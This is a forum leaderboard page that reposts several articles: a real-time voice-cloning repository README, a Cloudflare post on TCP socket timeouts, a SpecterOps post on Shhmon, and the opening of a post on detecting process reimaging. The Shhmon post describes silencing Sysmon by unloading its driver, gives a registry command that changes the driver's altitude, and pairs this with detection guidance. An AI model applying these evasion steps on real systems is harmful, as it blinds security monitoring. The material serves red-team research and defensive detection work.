
Leaderboard

Popular Content

Showing content with the highest reputation on 09/23/19 in all areas

  1. Full Steam Ahead: Remotely Executing Code in Modern Desktop Application Architectures - Thomas Shadwell - INFILTRATE 2019
    2 points
  2. Real-Time Voice Cloning

This repository is an implementation of Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis (SV2TTS) with a vocoder that works in real-time. Feel free to check my thesis if you're curious, or if you're looking for info I haven't documented yet (don't hesitate to open an issue for that too). Mostly I would recommend giving a quick look at the figures beyond the introduction.

SV2TTS is a three-stage deep learning framework that makes it possible to create a numerical representation of a voice from a few seconds of audio, and to use it to condition a text-to-speech model trained to generalize to new voices.

Video demonstration (click the picture):

Papers implemented

URL        | Designation             | Title                                                                        | Implementation source
1806.04558 | SV2TTS                  | Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis | This repo
1802.08435 | WaveRNN (vocoder)       | Efficient Neural Audio Synthesis                                             | fatchord/WaveRNN
1712.05884 | Tacotron 2 (synthesizer)| Natural TTS Synthesis by Conditioning Wavenet on Mel Spectrogram Predictions | Rayhane-mamah/Tacotron-2
1710.10467 | GE2E (encoder)          | Generalized End-To-End Loss for Speaker Verification                         | This repo

News

20/08/19: I'm working on resemblyzer, an independent package for the voice encoder. You can use your trained encoder models from this repo with it.
06/07/19: Need to run within a docker container on a remote server? See here.
25/06/19: Experimental support for low-memory GPUs (~2 GB) added for the synthesizer. Pass --low_mem to demo_cli.py or demo_toolbox.py to enable it. It adds a big overhead, so it's not recommended if you have enough VRAM.

Quick start

Requirements

You will need the following whether you plan to use the toolbox only or to retrain the models. Python 3.7. Python 3.6 might work too, but I wouldn't go lower because I make extensive use of pathlib. Run pip install -r requirements.txt to install the necessary packages. Additionally you will need PyTorch (>=1.0.1).
A GPU is mandatory, but you don't necessarily need a high-tier GPU if you only want to use the toolbox.

Pretrained models

Download the latest here.

Preliminary

Before you download any dataset, you can begin by testing your configuration with:

python demo_cli.py

If all tests pass, you're good to go.

Datasets

For playing with the toolbox alone, I only recommend downloading LibriSpeech/train-clean-100. Extract the contents as <datasets_root>/LibriSpeech/train-clean-100 where <datasets_root> is a directory of your choosing. Other datasets are supported in the toolbox, see here. You're free not to download any dataset, but then you will need your own data as audio files, or you will have to record it with the toolbox.

Toolbox

You can then try the toolbox:

python demo_toolbox.py -d <datasets_root>
or
python demo_toolbox.py

depending on whether you downloaded any datasets. If you are running an X-server or if you have the error Aborted (core dumped), see this issue.

Wiki

How it all works (WIP - stub, you might be better off reading my thesis until it's done)
Training models yourself
Training with other data/languages (WIP - see here for now)
TODO and planned features

Contribution

Feel free to open issues or PRs for any problem you may encounter, typos that you see or aspects that are confusing. I try to reply to every issue. I'm working full-time as of June 2019. I won't be making progress of my own on this repo, but I will still gladly merge PRs and accept contributions to the wiki. Don't hesitate to send me an email if you wish to contribute.

Sursa: https://github.com/CorentinJ/Real-Time-Voice-Cloning
    1 point
  3. When TCP sockets refuse to die

Marek Majkowski
September 20, 2019 3:53PM

While working on our Spectrum server, we noticed something weird: the TCP sockets which we thought should have been closed were lingering around. We realized we don't really understand when TCP sockets are supposed to time out!

Image by Sergiodc2 CC BY SA 3.0

In our code, we wanted to make sure we don't hold connections to dead hosts. In our early code we naively thought enabling TCP keepalives would be enough... but it isn't. It turns out the fairly modern TCP_USER_TIMEOUT socket option is equally as important. Furthermore it interacts with TCP keepalives in subtle ways. Many people are confused by this.

In this blog post, we'll try to show how these options work. We'll show how a TCP socket can time out during various stages of its lifetime, and how TCP keepalives and user timeout influence that. To better illustrate the internals of TCP connections, we'll mix the outputs of the tcpdump and the ss -o commands. This nicely shows the transmitted packets and the changing parameters of the TCP connections.

SYN-SENT

Let's start from the simplest case - what happens when one attempts to establish a connection to a server which discards inbound SYN packets? The scripts used here are available on our Github.

$ sudo ./test-syn-sent.py # all packets dropped
00:00.000 IP host.2 > host.1: Flags [S] # initial SYN
State Recv-Q Send-Q Local:Port Peer:Port
SYN-SENT 0 1 host:2 host:1 timer:(on,940ms,0)
00:01.028 IP host.2 > host.1: Flags [S] # first retry
00:03.044 IP host.2 > host.1: Flags [S] # second retry
00:07.236 IP host.2 > host.1: Flags [S] # third retry
00:15.427 IP host.2 > host.1: Flags [S] # fourth retry
00:31.560 IP host.2 > host.1: Flags [S] # fifth retry
01:04.324 IP host.2 > host.1: Flags [S] # sixth retry
02:10.000 connect ETIMEDOUT

Ok, this was easy. After the connect() syscall, the operating system sends a SYN packet.
Since it didn't get any response, the OS will by default retry sending it 6 times. This can be tweaked via sysctl:

$ sysctl net.ipv4.tcp_syn_retries
net.ipv4.tcp_syn_retries = 6

It's possible to override this setting per-socket with the TCP_SYNCNT setsockopt:

setsockopt(sd, IPPROTO_TCP, TCP_SYNCNT, 6);

The retries are staggered at the 1s, 3s, 7s, 15s, 31s, 63s marks (the inter-retry time starts at 2s and then doubles each time). By default the whole process takes 130 seconds, until the kernel gives up with the ETIMEDOUT errno. At this moment in the lifetime of a connection, SO_KEEPALIVE settings are ignored, but TCP_USER_TIMEOUT is not. For example, setting it to 5000 ms will cause the following interaction:

$ sudo ./test-syn-sent.py 5000 # all packets dropped
00:00.000 IP host.2 > host.1: Flags [S] # initial SYN
State Recv-Q Send-Q Local:Port Peer:Port
SYN-SENT 0 1 host:2 host:1 timer:(on,996ms,0)
00:01.016 IP host.2 > host.1: Flags [S] # first retry
00:03.032 IP host.2 > host.1: Flags [S] # second retry
00:05.016 IP host.2 > host.1: Flags [S] # what is this?
00:05.024 IP host.2 > host.1: Flags [S] # what is this?
00:05.036 IP host.2 > host.1: Flags [S] # what is this?
00:05.044 IP host.2 > host.1: Flags [S] # what is this?
00:05.050 connect ETIMEDOUT

Even though we set the user timeout to 5s, we still saw the six SYN retries on the wire. This behaviour is probably a bug (as tested on a 5.2 kernel): we would expect only two retries to be sent - at the 1s and 3s marks - and the socket to expire at the 5s mark. Instead, we saw a further 4 retransmitted SYN packets aligned to the 5s mark - which makes no sense. Anyhow, we learned a thing - TCP_USER_TIMEOUT does affect the behaviour of connect().

SYN-RECV

SYN-RECV sockets are usually hidden from the application. They live as mini-sockets on the SYN queue. We wrote about the SYN and Accept queues in the past. Sometimes, when SYN cookies are enabled, the sockets may skip the SYN-RECV state altogether.
In the SYN-RECV state, the socket will retry sending SYN+ACK 5 times, as controlled by:

$ sysctl net.ipv4.tcp_synack_retries
net.ipv4.tcp_synack_retries = 5

Here is how it looks on the wire:

$ sudo ./test-syn-recv.py
00:00.000 IP host.2 > host.1: Flags [S] # all subsequent packets dropped
00:00.000 IP host.1 > host.2: Flags [S.] # initial SYN+ACK
State Recv-Q Send-Q Local:Port Peer:Port
SYN-RECV 0 0 host:1 host:2 timer:(on,996ms,0)
00:01.033 IP host.1 > host.2: Flags [S.] # first retry
00:03.045 IP host.1 > host.2: Flags [S.] # second retry
00:07.301 IP host.1 > host.2: Flags [S.] # third retry
00:15.493 IP host.1 > host.2: Flags [S.] # fourth retry
00:31.621 IP host.1 > host.2: Flags [S.] # fifth retry
01:04.610 SYN-RECV disappears

With default settings, the SYN+ACK is retransmitted at the 1s, 3s, 7s, 15s, 31s marks, and the SYN-RECV socket disappears at the 64s mark. Neither SO_KEEPALIVE nor TCP_USER_TIMEOUT affects the lifetime of SYN-RECV sockets.

Final handshake ACK

After receiving the second packet in the TCP handshake - the SYN+ACK - the client socket moves to the ESTABLISHED state. The server socket remains in SYN-RECV until it receives the final ACK packet. Losing this ACK doesn't change anything - the server socket will just take a bit longer to move from SYN-RECV to ESTAB. Here is how it looks:

00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.]
00:00.000 IP host.2 > host.1: Flags [.] # initial ACK, dropped
State Recv-Q Send-Q Local:Port Peer:Port
SYN-RECV 0 0 host:1 host:2 timer:(on,1sec,0)
ESTAB 0 0 host:2 host:1
00:01.014 IP host.1 > host.2: Flags [S.]
00:01.014 IP host.2 > host.1: Flags [.] # retried ACK, dropped
State Recv-Q Send-Q Local:Port Peer:Port
SYN-RECV 0 0 host:1 host:2 timer:(on,1.012ms,1)
ESTAB 0 0 host:2 host:1

As you can see, SYN-RECV has the "on" timer, the same as in the example before. We might argue this final ACK doesn't really carry much weight.
This thinking led to the development of the TCP_DEFER_ACCEPT feature - it basically causes the third ACK to be silently dropped. With this flag set, the socket remains in the SYN-RECV state until it receives the first packet with actual data:

$ sudo ./test-syn-ack.py
00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.]
00:00.000 IP host.2 > host.1: Flags [.] # delivered, but the socket stays as SYN-RECV
State Recv-Q Send-Q Local:Port Peer:Port
SYN-RECV 0 0 host:1 host:2 timer:(on,7.192ms,0)
ESTAB 0 0 host:2 host:1
00:08.020 IP host.2 > host.1: Flags [P.], length 11 # payload moves the socket to ESTAB
State Recv-Q Send-Q Local:Port Peer:Port
ESTAB 11 0 host:1 host:2
ESTAB 0 0 host:2 host:1

The server socket remained in the SYN-RECV state even after receiving the final TCP-handshake ACK. It has a funny "on" timer, with the counter stuck at 0 retries. It is converted to ESTAB - and moved from the SYN to the accept queue - after the client sends a data packet or after the TCP_DEFER_ACCEPT timer expires. Basically, with DEFER ACCEPT the SYN-RECV mini-socket discards the data-less inbound ACK.

Idle ESTAB is forever

Let's move on and discuss a fully-established socket connected to an unhealthy (dead) peer. After completion of the handshake, the sockets on both sides move to the ESTABLISHED state, like:

State Recv-Q Send-Q Local:Port Peer:Port
ESTAB 0 0 host:2 host:1
ESTAB 0 0 host:1 host:2

These sockets have no running timer by default - they will remain in that state forever, even if the communication is broken. The TCP stack will notice problems only when one side attempts to send something. This raises a question - what to do if you don't plan on sending any data over a connection? How do you make sure an idle connection is healthy, without sending any data over it?

This is where TCP keepalives come in. Let's see them in action - in this example we used the following toggles:

SO_KEEPALIVE = 1 - Let's enable keepalives.
TCP_KEEPIDLE = 5 - Send the first keepalive probe after 5 seconds of idleness.
TCP_KEEPINTVL = 3 - Send subsequent keepalive probes 3 seconds apart.
TCP_KEEPCNT = 3 - Time out after three failed probes.

$ sudo ./test-idle.py
00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.]
00:00.000 IP host.2 > host.1: Flags [.]
State Recv-Q Send-Q Local:Port Peer:Port
ESTAB 0 0 host:1 host:2
ESTAB 0 0 host:2 host:1 timer:(keepalive,2.992ms,0)
# all subsequent packets dropped
00:05.083 IP host.2 > host.1: Flags [.], ack 1 # first keepalive probe
00:08.155 IP host.2 > host.1: Flags [.], ack 1 # second keepalive probe
00:11.231 IP host.2 > host.1: Flags [.], ack 1 # third keepalive probe
00:14.299 IP host.2 > host.1: Flags [R.], seq 1, ack 1

Indeed! We can clearly see the first probe sent at the 5s mark, and the two remaining probes 3s apart - exactly as we specified. After a total of three sent probes, and a further three seconds of delay, the connection dies with ETIMEDOUT, and the final RST is transmitted. For keepalives to work, the send buffer must be empty. You can see the keepalive timer active in the "timer:(keepalive)" line.

Keepalives with TCP_USER_TIMEOUT are confusing

We mentioned the TCP_USER_TIMEOUT option before. It sets the maximum amount of time that transmitted data may remain unacknowledged before the kernel forcefully closes the connection. On its own, it doesn't do much in the case of idle connections. The sockets will remain ESTABLISHED even if the connectivity is dropped. However, this socket option does change the semantics of TCP keepalives. The tcp(7) manpage is somewhat confusing:

Moreover, when used with the TCP keepalive (SO_KEEPALIVE) option, TCP_USER_TIMEOUT will override keepalive to determine when to close a connection due to keepalive failure.
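For reference, the keepalive toggles used in these experiments map directly onto setsockopt calls. Below is a minimal Python sketch of setting them together with TCP_USER_TIMEOUT; the helper name is mine, not from the article's scripts, and the TCP_KEEP*/TCP_USER_TIMEOUT constants are Linux-only:

```python
import socket

def enable_keepalives(sock, idle=5, intvl=3, cnt=3, user_timeout_ms=None):
    """Configure TCP keepalives on a socket (Linux-only constants).

    idle:  seconds of idleness before the first probe
    intvl: seconds between subsequent probes
    cnt:   failed probes before the connection is considered dead
    user_timeout_ms: optional TCP_USER_TIMEOUT; note that, as the
        article explains, it overrides TCP_KEEPCNT in subtle ways.
    """
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, idle)
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, intvl)
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, cnt)
    if user_timeout_ms is not None:
        sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_USER_TIMEOUT,
                        user_timeout_ms)
```

The options can be set before or after connect(); the keepalive timer only starts once the socket is established and idle.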
The original commit message has slightly more detail: tcp: Add TCP_USER_TIMEOUT socket option

To understand the semantics, we need to look at the kernel code in linux/net/ipv4/tcp_timer.c:693:

if ((icsk->icsk_user_timeout != 0 &&
     elapsed >= msecs_to_jiffies(icsk->icsk_user_timeout) &&
     icsk->icsk_probes_out > 0) ||

For the user timeout to have any effect, icsk_probes_out must not be zero. The check for the user timeout is done only after the first probe went out. Let's check it out. Our connection settings:

TCP_USER_TIMEOUT = 5*1000 - 5 seconds
SO_KEEPALIVE = 1 - enable keepalives
TCP_KEEPIDLE = 1 - send the first probe quickly - 1 second idle
TCP_KEEPINTVL = 11 - subsequent probes every 11 seconds
TCP_KEEPCNT = 3 - send three probes before timing out

00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.]
00:00.000 IP host.2 > host.1: Flags [.]
# all subsequent packets dropped
00:01.001 IP host.2 > host.1: Flags [.], ack 1 # first probe
00:12.233 IP host.2 > host.1: Flags [R.] # timer for second probe fired, socket aborted due to TCP_USER_TIMEOUT

So what happened? The connection sent the first keepalive probe at the 1s mark. Seeing no response, the TCP stack then woke up 11 seconds later to send a second probe. This time though, it executed the USER_TIMEOUT code path, which decided to terminate the connection immediately.

What if we bump TCP_USER_TIMEOUT to a larger value, say between the second and third probe? Then the connection will be closed on the third probe timer. With TCP_USER_TIMEOUT set to 12.5s:

00:01.022 IP host.2 > host.1: Flags [.] # first probe
00:12.094 IP host.2 > host.1: Flags [.] # second probe
00:23.102 IP host.2 > host.1: Flags [R.] # timer for third probe fired, socket aborted due to TCP_USER_TIMEOUT

We've shown how TCP_USER_TIMEOUT interacts with keepalives for small and medium values. The last case is when TCP_USER_TIMEOUT is extraordinarily large.
Say we set it to 30s:

00:01.027 IP host.2 > host.1: Flags [.], ack 1 # first probe
00:12.195 IP host.2 > host.1: Flags [.], ack 1 # second probe
00:23.207 IP host.2 > host.1: Flags [.], ack 1 # third probe
00:34.211 IP host.2 > host.1: Flags [.], ack 1 # fourth probe! But TCP_KEEPCNT was only 3!
00:45.219 IP host.2 > host.1: Flags [.], ack 1 # fifth probe!
00:56.227 IP host.2 > host.1: Flags [.], ack 1 # sixth probe!
01:07.235 IP host.2 > host.1: Flags [R.], seq 1 # TCP_USER_TIMEOUT aborts conn on 7th probe timer

We saw six keepalive probes on the wire! With TCP_USER_TIMEOUT set, TCP_KEEPCNT is totally ignored. If you want TCP_KEEPCNT to make sense, the only sensible USER_TIMEOUT value is slightly smaller than:

TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT

Busy ESTAB socket is not forever

Thus far we have discussed the case where the connection is idle. Different rules apply when the connection has unacknowledged data in its send buffer. Let's prepare another experiment - after the three-way handshake, let's set up a firewall to drop all packets. Then, let's do a send on one end to have some dropped packets in flight. An experiment shows the sending socket dies after ~16 minutes:

00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.]
00:00.000 IP host.2 > host.1: Flags [.]
# All subsequent packets dropped
00:00.206 IP host.2 > host.1: Flags [P.], length 11 # first data packet
00:00.412 IP host.2 > host.1: Flags [P.], length 11 # early retransmit, doesn't count
00:00.620 IP host.2 > host.1: Flags [P.], length 11 # 1st retry
00:01.048 IP host.2 > host.1: Flags [P.], length 11 # 2nd retry
00:01.880 IP host.2 > host.1: Flags [P.], length 11 # 3rd retry
State Recv-Q Send-Q Local:Port Peer:Port
ESTAB 0 0 host:1 host:2
ESTAB 0 11 host:2 host:1 timer:(on,1.304ms,3)
00:03.543 IP host.2 > host.1: Flags [P.], length 11 # 4th
00:07.000 IP host.2 > host.1: Flags [P.], length 11 # 5th
00:13.656 IP host.2 > host.1: Flags [P.], length 11 # 6th
00:26.968 IP host.2 > host.1: Flags [P.], length 11 # 7th
00:54.616 IP host.2 > host.1: Flags [P.], length 11 # 8th
01:47.868 IP host.2 > host.1: Flags [P.], length 11 # 9th
03:34.360 IP host.2 > host.1: Flags [P.], length 11 # 10th
05:35.192 IP host.2 > host.1: Flags [P.], length 11 # 11th
07:36.024 IP host.2 > host.1: Flags [P.], length 11 # 12th
09:36.855 IP host.2 > host.1: Flags [P.], length 11 # 13th
11:37.692 IP host.2 > host.1: Flags [P.], length 11 # 14th
13:38.524 IP host.2 > host.1: Flags [P.], length 11 # 15th
15:39.500 connection ETIMEDOUT

The data packet is retransmitted 15 times, as controlled by:

$ sysctl net.ipv4.tcp_retries2
net.ipv4.tcp_retries2 = 15

From the ip-sysctl.txt documentation:

The default value of 15 yields a hypothetical timeout of 924.6 seconds and is a lower bound for the effective timeout. TCP will effectively time out at the first RTO which exceeds the hypothetical timeout.

The connection indeed died at ~940 seconds. Notice the socket has the "on" timer running. It doesn't matter at all if we set SO_KEEPALIVE - when the "on" timer is running, keepalives are not engaged. TCP_USER_TIMEOUT keeps on working though. The connection will be aborted exactly user-timeout seconds after the last received packet. With the user timeout set, the tcp_retries2 value is ignored.
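For busy sockets, TCP_USER_TIMEOUT is therefore the practical way to bound how long unacknowledged data may linger. A minimal Python sketch of applying it (the helper name is mine; socket.TCP_USER_TIMEOUT is a Linux-only constant, available since Python 3.6):

```python
import socket

def abort_when_unacked(sock, timeout_ms):
    """Ask the kernel to abort the connection once transmitted data has
    stayed unacknowledged for timeout_ms milliseconds, instead of
    waiting out all tcp_retries2 retransmissions (~16 minutes with
    Linux defaults)."""
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_USER_TIMEOUT, timeout_ms)
```

A value of 0 restores the default behaviour; as shown above, a non-zero value makes the kernel abort the connection on the first retransmission timer that fires past the deadline.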
Zero-window ESTAB is... forever?

There is one final case worth mentioning. If the sender has plenty of data, and the receiver is slow, then TCP flow control kicks in. At some point the receiver will ask the sender to stop transmitting new data. This is a slightly different condition than the one described above.

In this case, with flow control engaged, there is no in-flight or unacknowledged data. Instead the receiver throttles the sender with a "zero window" notification. Then the sender periodically checks if the condition is still valid with "window probes". In this experiment we reduced the receive buffer size for simplicity. Here's how it looks on the wire:

00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.], win 1152
00:00.000 IP host.2 > host.1: Flags [.]
00:00.202 IP host.2 > host.1: Flags [.], length 576 # first data packet
00:00.202 IP host.1 > host.2: Flags [.], ack 577, win 576
00:00.202 IP host.2 > host.1: Flags [P.], length 576 # second data packet
00:00.244 IP host.1 > host.2: Flags [.], ack 1153, win 0 # throttle it! zero-window
00:00.456 IP host.2 > host.1: Flags [.], ack 1 # zero-window probe
00:00.456 IP host.1 > host.2: Flags [.], ack 1153, win 0 # nope, still zero-window
State Recv-Q Send-Q Local:Port Peer:Port
ESTAB 1152 0 host:1 host:2
ESTAB 0 129920 host:2 host:1 timer:(persist,048ms,0)

The packet capture shows a couple of things. First, we can see two packets with data, each 576 bytes long. They both were immediately acknowledged. The second ACK had the "win 0" notification: the sender was told to stop sending data. But the sender is eager to send more! The last two packets show a first "window probe": the sender will periodically send payload-less "ack" packets to check if the window size has changed. As long as the receiver keeps on answering, the sender will keep on sending such probes forever.
The socket information shows three important things:

The read buffer of the reader is filled - thus the "zero window" throttling is expected.
The write buffer of the sender is filled - we have more data to send.
The sender has a "persist" timer running, counting the time until the next "window probe".

In this blog post we are interested in timeouts - what will happen if the window probes are lost? Will the sender notice?

By default the window probe is retried 15 times - adhering to the usual tcp_retries2 setting. The TCP timer is in the persist state, so TCP keepalives will not be running. The SO_KEEPALIVE settings don't make any difference when window probing is engaged.

As expected, the TCP_USER_TIMEOUT toggle keeps on working. A slight difference is that, similarly to the user timeout on keepalives, it's engaged only when the retransmission timer fires. During such an event, if more than user-timeout seconds have passed since the last good packet, the connection will be aborted.

Note about using application timeouts

In the past we have shared an interesting war story: The curious case of slow downloads. Our HTTP server gave up on the connection after an application-managed timeout fired. This was a bug - a slow connection might have correctly, slowly drained the send buffer, but the application server didn't notice that. We abruptly dropped slow downloads, even though this wasn't our intention. We just wanted to make sure the client connection was still healthy. It would be better to use TCP_USER_TIMEOUT than rely on application-managed timeouts.

But this is not sufficient. We also wanted to guard against a situation where a client stream is valid, but is stuck and doesn't drain the connection. The only way to achieve this is to periodically check the amount of unsent data in the send buffer, and see if it shrinks at a desired pace. For typical applications sending data to the Internet, I would recommend:

Enable TCP keepalives.
This is needed to keep some data flowing in the idle-connection case.

Set TCP_USER_TIMEOUT to TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT.

Be careful when using application-managed timeouts. To detect TCP failures use TCP keepalives and the user timeout. If you want to spare resources and make sure sockets don't stay alive for too long, consider periodically checking if the socket is draining at the desired pace. You can use ioctl(TIOCOUTQ) for that, but it counts both data buffered (notsent) on the socket and in-flight (unacknowledged) bytes. A better way is to use the TCP_INFO tcpi_notsent_bytes parameter, which reports only the former counter.

An example of checking the draining pace:

while True:
    notsent1 = get_tcp_info(c).tcpi_notsent_bytes
    notsent1_ts = time.time()
    ...
    poll.poll(POLL_PERIOD)
    ...
    notsent2 = get_tcp_info(c).tcpi_notsent_bytes
    notsent2_ts = time.time()
    pace_in_bytes_per_second = (notsent1 - notsent2) / (notsent2_ts - notsent1_ts)
    if pace_in_bytes_per_second > 12000:
        pass  # pace is above effective rate of 96Kbps, ok!
    else:
        pass  # socket is too slow...

There are ways to further improve this logic. We could use TCP_NOTSENT_LOWAT, although it's generally only useful for situations where the send buffer is relatively empty. Then we could use the SO_TIMESTAMPING interface for notifications about when data gets delivered. Finally, if we are done sending the data to the socket, it's possible to just call close() and defer handling of the socket to the operating system. Such a socket will be stuck in the FIN-WAIT-1 or LAST-ACK state until it correctly drains.

Summary

In this post we discussed five cases where the TCP connection may notice the other party going away:

SYN-SENT: The duration of this state can be controlled by TCP_SYNCNT or tcp_syn_retries.
SYN-RECV: It's usually hidden from the application. It is tuned by tcp_synack_retries.
Idling ESTABLISHED connections will never notice any issues. A solution is to use TCP keepalives.
Busy ESTABLISHED connections adhere to the tcp_retries2 setting, and ignore TCP keepalives.
Zero-window ESTABLISHED connections adhere to the tcp_retries2 setting, and ignore TCP keepalives.

Especially the last two ESTABLISHED cases can be customized with TCP_USER_TIMEOUT, but this setting also affects other situations. Generally speaking, it can be thought of as a hint to the kernel to abort the connection after so-many seconds since the last good packet. This is a dangerous setting though, and if used in conjunction with TCP keepalives it should be set to a value slightly lower than TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT. Otherwise it will affect, and potentially cancel out, the TCP_KEEPCNT value.

In this post we presented scripts showing the effects of timeout-related socket options under various network conditions. Interleaving the tcpdump packet capture with the output of ss -o is a great way of understanding the networking stack. We were able to create reproducible test cases showing the "on", "keepalive" and "persist" timers in action. This is a very useful framework for further experimentation.

Finally, it's surprisingly hard to tune a TCP connection to be confident that the remote host is actually up. During our debugging we found that looking at the send buffer size and the currently active TCP timer can be very helpful in understanding whether the socket is actually healthy. The bug in our Spectrum application turned out to be a wrong TCP_USER_TIMEOUT setting - without it, sockets with large send buffers were lingering around for way longer than we intended.

The scripts used in this article can be found on our Github. Figuring this out has been a collaboration across three Cloudflare offices. Thanks to Hiren Panchasara from San Jose, Warren Nelson from Austin and Jakub Sitnicki from Warsaw. Fancy joining the team? Apply here!

Sursa: https://blog.cloudflare.com/when-tcp-sockets-refuse-to-die/
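[Editor's note] The send-buffer check the article recommends can be done from Python via the ioctl(TIOCOUTQ) it mentions. This is a sketch under my own naming (Linux-only); as the article warns, the counter includes both not-yet-sent and sent-but-unacknowledged bytes, unlike tcpi_notsent_bytes:

```python
import fcntl
import socket
import struct
import termios

def send_queue_bytes(sock):
    """Return the number of bytes still in the socket's send queue,
    i.e. data buffered but unsent plus data in flight (unacknowledged),
    as reported by ioctl(TIOCOUTQ) on Linux."""
    raw = fcntl.ioctl(sock.fileno(), termios.TIOCOUTQ, struct.pack("i", 0))
    return struct.unpack("i", raw)[0]
```

Sampling this value periodically, as in the article's draining-pace loop, shows whether a slow peer is still making progress.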
    1 point
  4. Shhmon — Silencing Sysmon via Driver Unload

Matt Hand
Sep 18 · 4 min read

Sysmon is an incredibly powerful tool to aid in data collection beyond Windows' standard event logging capabilities. It presents a significant challenge for us as attackers, as it can detect many indicators that we generate during operations, such as process creation, registry changes, and file creation, among many other things.

Sysmon consists of 2 main pieces — a system service and a driver. The driver provides the service with information which is processed for consumption by the user. Both the service's and the driver's names can be changed from their defaults to obfuscate the fact that Sysmon is running on the host.

Today I am releasing Shhmon, a C# tool to challenge the assumption that our defensive tools are functioning as intended. It also introduces a situation where the Sysmon driver has been unloaded by a user without fltMC.exe while the service is still running.

https://github.com/matterpreter/Shhmon

Despite being able to rename the Sysmon driver during installation (Sysmon.exe -i -d $DriverName), it is loaded at a predefined altitude of 385201 at installation. A driver altitude is a unique identifier allocated by Microsoft indicating the driver's position relative to others in the file system stack. Think of this as a driver's assigned parking spot: each driver has a reserved spot where it is supposed to park, and the driver should abide by this allocation.

We can use functions supplied in fltlib.dll (FilterFindFirst() and FilterFindNext()) to hunt for a driver at altitude 385201 and unload it. This is similar to the functionality behind fltMC.exe unload $DriverName, but it allows us to evade command-line logging which would be captured by Sysmon before the driver is unloaded. In order to unload the driver, the current process token needs to have SeLoadDriverPrivilege enabled, which Shhmon grants to itself using advapi32!AdjustTokenPrivileges.
Defensive Guidance

This technique generates interesting events worth investigating and correlating.

Sysmon Event ID 255: Once the driver is unloaded, an error event with an ID of DriverCommunication will be generated. After this error occurs, logs will no longer be collected and parsed by Sysmon.

Windows System Event ID 1: This event will also be generated on unload from the source "FilterManager", stating File System Filter <DriverName> (Version 0.0, <Timestamp>) unloaded successfully. This event was not observed to be generated during a normal system restart.

Windows Security Event ID 4672: In order to unload the driver, our Shhmon process needs to be granted SeLoadDriverPrivilege. During testing, this permission was only sporadically granted to NT AUTHORITY\SYSTEM and is not a part of its standard permission set.

Sysmon Event ID 1/Windows Security Event ID 4688: Despite the intent of evading command-line logging by using the API, the calling process will still be logged. An abnormal, high-integrity process which is assigned SeLoadDriverPrivilege could be correlated with the above events to serve as a starting point for hunting. Bear in mind that this assembly could be used via something like Cobalt Strike's execute-assembly functionality, where a seemingly innocuous binary would be the calling process.

Going beyond these, I have found that the Sysmon driver's altitude can be changed via the registry:

reg add "HKLM\SYSTEM\CurrentControlSet\Services\<DriverName>\Instances\Sysmon Instance" /v Altitude /t REG_SZ /d 31337

When the system is rebooted, the driver will be reloaded at the newly specified altitude.

Sysmon with a non-default driver name running at altitude 31337

The new altitude could be discovered by reading the registry key HKLM:\SYSTEM\CurrentControlSet\Services\*\Instances\Sysmon Instance\Altitude, but this adds an additional layer of obfuscation which will need to be accounted for by an attacker.
Note: I have found during testing that if the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.

Additionally, there may be an opportunity to audit a handle opening on the \\.\FltMgr device object, which is done by fltlib!FilterUnload, by applying a SACL to the device object. Many thanks to Matt Graeber and Brian Reitz for helping me hone in on these.

References:
Research inspiration from @Carlos_Perez's post describing this tactic, as well as Matt Graeber and Lee Christensen's Black Hat USA 2018 white paper.
Alexsey Kabanov's LazyCopy minifilter for demonstrating the marshaling of filter information and their method for creating resizable buffers.

Posts By SpecterOps Team Members

Written by Matt Hand
I like red teaming, picking up heavy things, and burritos. Adversary Simulation @ SpecterOps. github.com/matterpreter

Sursa: https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650
    1 point
  5. You Can Run, But You Can’t Hide — Detecting Process Reimaging Behavior

Jonathan Johnson
Sep 16 · 9 min read

Background:

Around 3 months ago, a new attack technique known as "Process Reimaging" was introduced to the InfoSec community. This technique was released by the McAfee Security team in a blog titled "In NTDLL I Trust — Process Reimaging and Endpoint Security Solution Bypass." A few days after this attack technique was released, a co-worker and friend of mine — Dwight Hohnstein — came out with proof of concept code demonstrating this technique, which can be found on his GitHub. While this technique isn't yet mapped to MITRE ATT&CK, I believe it would fall under the Defense Evasion tactic.

Although the purpose of this blog post is to show the methodology used to build a detection for this attack, it assumes you have read the blog released by the McAfee team and have looked at Dwight's proof of concept code. A brief high-level outline of the attack is as follows:

Process Reimaging is an attack technique that leverages inconsistencies in how the Windows operating system determines process image FILE_OBJECT locations. This means that an attacker can drop a binary on disk and hide the physical location of that file by replacing its initial execution full file path with that of a trusted binary. This in turn allows an adversary to bypass Windows operating system process attribute verification, hiding themselves in the context of the process image of their choosing.

There are three stages involved in this attack:

A binary dropped to disk — this assumes breach and that the attacker can drop a binary to disk.
Undetected binary loaded. This will be the original image loaded after process creation.
The malicious binary is "reimaged" to a known good binary it should appear as. This is achievable because the Virtual Address Descriptors (VADs) don't update when the image is renamed.
